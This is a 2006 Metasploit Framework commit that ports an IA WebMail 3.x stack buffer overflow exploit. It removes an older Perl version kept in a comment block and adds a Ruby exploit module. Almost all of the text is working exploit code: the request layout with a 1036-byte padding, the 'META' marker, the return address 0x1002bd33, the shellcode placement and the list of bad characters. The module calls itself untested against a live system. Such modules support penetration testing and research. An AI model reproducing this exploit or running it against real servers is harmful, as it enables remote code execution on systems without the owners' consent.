ia webmail port, not tested

git-svn-id: file:///home/svn/framework3/trunk@4009 4d416f70-5f16-0410-b530-b9f4589650da
2006-10-03 05:42:34 +00:00 · 2006-10-03 05:42:34 +00:00 · 56780bed66
parent 17e97fc84c
commit 56780bed66
2 changed files with 64 additions and 163 deletions
--- a/dev/porting/queue/ia_webmail.rb
+++ b/dev/porting/queue/ia_webmail.rb
@ -1,163 +0,0 @@
-require 'msf/core'
-
-module Msf
-
-class Exploits::Windows::XXX_CHANGEME_XXX < Msf::Exploit::Remote
-
-	include Exploit::Remote::Tcp
-
-	def initialize(info = {})
-		super(update_info(info,	
-			'Name'           => 'IA WebMail 3.x Buffer Overflow',
-			'Description'    => %q{
-				This exploits a stack overflow in the IA WebMail server.
-				This exploit has not been tested against a live system at
-				this time.
-					
-			},
-			'Author'         => [ 'hdm' ],
-			'Version'        => '$Revision$',
-			'References'     =>
-				[
-					[ 'OSVDB', '2757'],
-					[ 'URL', 'http://www.k-otik.net/exploits/11.19.iawebmail.pl.php'],
-					[ 'MIL', '24'],
-
-				],
-			'Privileged'     => false,
-			'Payload'        =>
-				{
-					'Space'    => 1024,
-					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
-
-				},
-			'Targets'        => 
-				[
-					[ 
-						'Automatic Targetting',
-						{
-							'Platform' => 'win32, win2000',
-							'Ret'      => 0x0,
-						},
-					],
-				],
-			'DisclosureDate' => 'Nov 3 2003',
-			'DefaultTarget' => 0))
-	end
-
-	def exploit
-		connect
-		
-		handler
-		disconnect
-	end
-
-=begin
-
-##
-# This file is part of the Metasploit Framework and may be redistributed
-# according to the licenses defined in the Authors field below. In the
-# case of an unknown or missing license, this file defaults to the same
-# license as the core Framework (dual GPLv2 and Artistic). The latest
-# version of the Framework can always be obtained from metasploit.com.
-##
-
-package Msf::Exploit::ia_webmail;
-use base "Msf::Exploit";
-use strict;
-use Pex::Text;
-
-my $advanced = { };
-
-my $info =
-  {
-	'Name'  => 'IA WebMail 3.x Buffer Overflow',
-	'Version'  => '$Revision$',
-	'Authors' => [ 'H D Moore <hdm [at] metasploit.com>', ],
-
-	'Arch'  => [ 'x86' ],
-	'OS'    => [ 'win32', 'win2000' ],
-	'Priv'  => 0,
-
-	'UserOpts'  =>
-	  {
-		'RHOST' => [1, 'ADDR', 'The target address'],
-		'RPORT' => [1, 'PORT', 'The target port', 80],
-	  },
-
-	'Payload' =>
-	  {
-		'Space'  => 1024,
-		'BadChars'  => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
-	  },
-
-	'Description'  =>  Pex::Text::Freeform(qq{
-        This exploits a stack overflow in the IA WebMail server. This
-        exploit has not been tested against a live system at this time.
-}),
-
-	'Refs'  =>
-	  [
-		['OSVDB', 2757],
-		['URL',   'http://www.k-otik.net/exploits/11.19.iawebmail.pl.php'],
-		['MIL',   '24'],
-	  ],
-
-	'DefaultTarget' => 0,
-	'Targets' => [['IA WebMail 3.x', 1036, 0x1002bd33]],
-
-	'Keys' => ['iawebmail'],
-
-	'DisclosureDate' => 'Nov 3 2003',
-  };
-
-sub new {
-	my $class = shift;
-	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
-	return($self);
-}
-
-# This exploit based on http://www.k-otik.net/exploits/11.19.iawebmail.pl.php
-sub Exploit {
-	my $self = shift;
-	my $target_host = $self->GetVar('RHOST');
-	my $target_port = $self->GetVar('RPORT');
-	my $target_idx  = $self->GetVar('TARGET');
-	my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
-
-	my @targets = @{$self->Targets};
-	my $target = $targets[$target_idx];
-
-	$self->PrintLine("[*] Attempting to exploit target " . $target->[0]);
-
-	my $request = "GET /" . ("o" x $target->[1]) . "META" .
-	  pack("V", $target->[2]). $shellcode .
-	  " HTTP/1.0\r\n\r\n";
-
-	my $s = Msf::Socket::Tcp->new
-	  (
-		'PeerAddr'  => $target_host,
-		'PeerPort'  => $target_port,
-		'LocalPort' => $self->GetVar('CPORT'),
-		'SSL'       => $self->GetVar('SSL'),
-	  );
-	if ($s->IsError) {
-		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
-		return;
-	}
-
-	$self->PrintLine("[*] Sending " .length($request) . " bytes to remote host.");
-	$s->Send($request);
-
-	$self->PrintLine("[*] Waiting for a response...");
-	my $r = $s->Recv(-1, 5);
-	sleep(2);
-	$s->Close();
-	return;
-}
-
-=end
-
-
-end
-end	
--- a/modules/exploits/windows/http/ia_webmail.rb
+++ b/modules/exploits/windows/http/ia_webmail.rb
@ -0,0 +1,64 @@
+require 'msf/core'
+
+module Msf
+
+class Exploits::Windows::Http::IaWebmail < Msf::Exploit::Remote
+
+	include Exploit::Remote::HttpClient
+
+	def initialize(info = {})
+		super(update_info(info,	
+			'Name'           => 'IA WebMail 3.x Buffer Overflow',
+			'Description'    => %q{
+				This exploits a stack overflow in the IA WebMail server.
+				This exploit has not been tested against a live system at
+				this time.
+					
+			},
+			'Author'         => [ 'hdm' ],
+			'Version'        => '$Revision: 3110 $',
+			'References'     =>
+				[
+					[ 'OSVDB', '2757'],
+					[ 'URL', 'http://www.k-otik.net/exploits/11.19.iawebmail.pl.php'],
+					[ 'MIL', '24'],
+
+				],
+			'Privileged'     => false,
+			'Payload'        =>
+				{
+					'Space'       => 1024,
+					'DisableNops' => true,
+					'BadChars'    => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
+
+				},
+			'Platform'       => 'win',
+			'Targets'        => 
+				[ 
+					[
+						'IA WebMail 3.x',
+						{
+							'Ret'    => 0x1002bd33,
+							'Length' => 1036
+						},
+					]
+				],
+			'DisclosureDate' => 'Nov 3 2003',
+			'DefaultTarget'  => 0))
+	end
+
+	def exploit
+		print_status("Sending request...")
+
+		request(
+			'uri' => 
+				"/" + ("o" * target['Length']) +
+				"META" +
+				[target.ret].pack('V') +
+				payload.encoded)
+
+		handler
+	end
+
+end
+end